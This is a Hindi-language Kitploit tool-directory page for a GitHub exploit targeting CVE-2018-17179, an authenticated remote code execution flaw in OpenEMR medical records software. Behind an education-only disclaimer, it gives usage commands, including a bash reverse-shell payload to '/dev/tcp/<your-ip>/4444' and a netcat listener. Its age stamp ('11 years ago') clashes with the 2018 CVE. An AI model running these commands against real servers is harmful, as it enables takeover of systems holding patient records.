Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-17179-OpenEMR | Kitploit
उपकरण/GitHubGitHub/cyberquestor-infosec/cve-2018-17179-openemr
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubcyberquestor-infosec/cve-2018-17179-openemr

CVE-2018-17179-OpenEMR

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
11 साल पहलेअभी तक समीक्षित नहीं

CVE-2018-17179-OpenEMR

⚠️ अस्वीकरण
यह रिपॉजिटरी केवल शैक्षिक और शोध उद्देश्यों के लिए है।
यहाँ दी गई जानकारी और कोड का उपयोग नियंत्रित वातावरण में किया जा सकता है, जैसे निजी प्रयोगशाला मशीनें।

इस कोड का अनधिकृत उपयोग उन सिस्टमों के विरुद्ध करना जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।
लेखक किसी भी दुरुपयोग या हुई क्षति के लिए जिम्मेदार नहीं है।


🔍 भेद्यता के बारे में

CVE-2018-17179 OpenEMR को प्रभावित करता है, जो व्यापक रूप से उपयोग किया जाने वाला ओपन-सोर्स इलेक्ट्रॉनिक मेडिकल रिकॉर्ड और प्रैक्टिस प्रबंधन सॉफ्टवेयर है।
rest_routes.php एंडपॉइंट के प्रमाणीकरण तंत्र में एक दोष प्रमाणित उपयोगकर्ता को सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देता है।

यह वेब सर्वर उपयोगकर्ता के संदर्भ में रिमोट कोड एक्ज़ीक्यूशन (RCE) का कारण बन सकता है।

  • भेद्यता प्रकार: प्रमाणित रिमोट कोड एक्ज़ीक्यूशन
  • प्रभावित घटक: rest_routes.php के माध्यम से interface/main/main_screen.php
  • प्रमाणीकरण आवश्यक: ✅ हाँ
  • गंभीरता: क्रिटिकल
  • CVSS स्कोर: 9.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

🧾 संदर्भ

  • Exploit-DB प्रविष्टि – 45161
  • OpenEMR GitHub रिपॉजिटरी
  • CVE Details – CVE-2018-17179
  • NVD CVE रिपोर्ट

🛠 एक्सप्लॉइट अवलोकन

यह रिपॉजिटरी Exploit-DB से सार्वजनिक एक्सप्लॉइट का संशोधित संस्करण प्रदान करती है:

  • एक्सप्लॉइट शीर्षक: OpenEMR 5.0.1 – प्रमाणित RCE
  • ExploitDB ID: 45161
  • भाषा: Python 2
  • प्रमाणीकरण आवश्यक: हाँ

इस अनुकूलित एक्सप्लॉइट में:

  • आप अपना कमांड पेलोड सीधे निर्दिष्ट कर सकते हैं (जैसे, रिवर्स शेल)।
  • एक्सप्लॉइट लचीलेपन के लिए स्वच्छ CLI निष्पादन की अनुमति देता है।
  • सत्र कुकी जनरेशन और कमांड इंजेक्शन लॉजिक जैसे संवेदनशील क्षेत्रों को मूल से संरक्षित किया गया है।

💥 प्रदर्शन

🔐 लॉगिन पेज

एक स्थानीय परीक्षण OpenEMR लॉगिन पैनल को लक्षित किया गया:

लॉगिन पेज


📂 एक्सप्लॉइट उपयोग

उपयोग: python2 exploit.py <target_url> -u -p -c

उदाहरण: python2 exploit.py http:///openemr -u admin -p secretpass -c 'id'

root@kitploit:~

- Make sure you have Python 2 installed.
- The user must have access to the vulnerable `rest_routes.php` endpoint.

एक्सप्लॉइट निष्पादित करें

संशोधित एक्सप्लॉइट स्क्रिप्ट को bash रिवर्स शेल पेलोड के साथ चलाया गया:

root@kitploit:~
python2 exploit.py http://<target>/openemr -u <username> -p <password> -c 'bash -i >& /dev/tcp/<your-ip>/4444 0>&1'

एक्सप्लॉइट आउटपुट

चरण 3 – रिवर्स शेल प्राप्त हुआ

पोर्ट 4444 पर Netcat लिसनर ने सफलतापूर्वक एक रिवर्स शेल प्राप्त किया:

root@kitploit:~
nc -nvlp 4444

एक्सप्लॉइट आउटपुट

📖 Medium ब्लॉग

मेरी Medium पोस्ट पर विस्तृत वॉकथ्रू और सिद्धांत देखें:
👉 Medium पर ब्लॉग पढ़ें

टूल डाउनलोड करें